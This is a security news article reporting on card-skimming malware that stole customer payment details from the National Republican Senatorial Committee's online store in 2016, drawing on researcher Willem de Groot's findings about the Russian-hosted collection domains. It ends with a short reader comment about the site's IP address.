Have you plastered a #NeverHillary sticker onto your refrigerator? One you picked up in the past 6 months from an online store run by Senate Republicans?
If so, your credit card details, along with those of your fellow Republican supporters, may have been skimmed.
Then, they were sent to a server in Russia and in all likelihood sold for something between $4 and $120: probably what a security researcher is estimating as roughly $30 a pop.
That researcher is Willem de Groot, co-founder of the Dutch e-commerce company Byte. On 4 October, he posted about discovering that the online store for the National Republican Senatorial Committee (NRSC) had been rigged with card-skimming malware.
The store sells pro-Republican t-shirts, stickers and baseball caps.
For 6 months, between 16 March and 5 October, the malware was running in the background as visitors entered items into their online carts.
The card-skimming code was sniffing for payment clues such as “checkout.” Once it detected the details, it collected all the information entered on orders, including buyers’ names and addresses, credit card numbers and merchandise ordered.
Then, it sent them to a Russian version of Paypal.
Here’s a video demonstrating how the attack worked:
Two days after de Groot posted his findings, the NRSC took down the site and told Reuters that yes, it had been hit by a “skimming operation”.
NRSC spokeswoman Andrea Bozek told the news outlet that a vendor discovered “an issue yesterday that affected an extremely small number of supporters.”
De Groot found that the malware had been in place for some time: at least since 16 March.
The NRSC said that the numbers affected account for less than 0.0018 percent of online donations to the NRSC. It hadn’t found any evidence that its primary donation system was hacked, however.
From a statement the NRSC sent to Reuters:
The problem was fixed immediately and we are contacting those who were affected.
The news went largely unnoticed until CSO’s Salted Hash reported the story on Monday.
When you hear of a cyber attacks on a national US political party and Russia, what springs to mind are the attacks on the Democratic National Committee (DNC).
In July, just days before the Democratic Convention, WikiLeaks released nearly 20,000 emails that it said came from the accounts of DNC officials.
The fallout has included both an email intrusion and the Twitter account hijacking of Hillary Clinton’s presidential campaign chairman, John Podesta.
What’s more, US politicians have accused Russian hackers of trying to sway US elections.
But according to a followup analysis de Groot published last Tuesday, the NRSC store wasn’t targeted at all.
Rather, it’s just one of thousands of online stores that he’s found compromised.
Many have been fixed, but more are still being skimmed, he says.
Beyond online stores, we’ve seen credit card skimming malware rigged up at gas stations, hotel chains, ATMs, and fast-food chains.
As for the sites receiving the card details, de Groot found two Russian credit card harvesters: jquery-cloud.net in March and, more recently, jquery-code.su in October.
Both domains are hosted by a company called Dataflow, which has a Russian language website but was registered last year in Belize.
De Groot says that Dataflow is a small network, but it’s a nasty one. Other things that run on the network span all the unsavoury flavors of online fraud: money launderers, synthetic drug traders, darknet messaging, phishers and spammers.
De Groot says he doesn’t know how many credit cards were stolen. As for how he came up with that estimate of $30 per credit card, he took an educated guess by looking up the Republican store on TrafficEstimate.
That site estimates that store.nrsc.org has been getting around 350K visits per month of late, so de Groot figures it this way:
A conservative conversion ratio of 1% yields 3500 stolen credit cards per month, or 21K stolen credits cards since March. Black market value per card is between $4 and $120, so I assume a modest $30 per card. The villains could have made roughly $600K on this store alone.
And that’s just how much the card skimmers might have sold the stolen details for, he points out.
Who knows how much the crooks who bought those cards may have racked up in fraudulent charges?
It’s a good idea to keep an eye on your credit card statements, regardless of your political affiliation. But if you’re a Republican who shops at the NRSC, keep two eagle eyes out.
Bryan
The NRSC’s site resolves to 104.20.23.33, which doesn’t match the Dataflow range of 80.87.204.0-80.87.205.255
Have they switched hosting?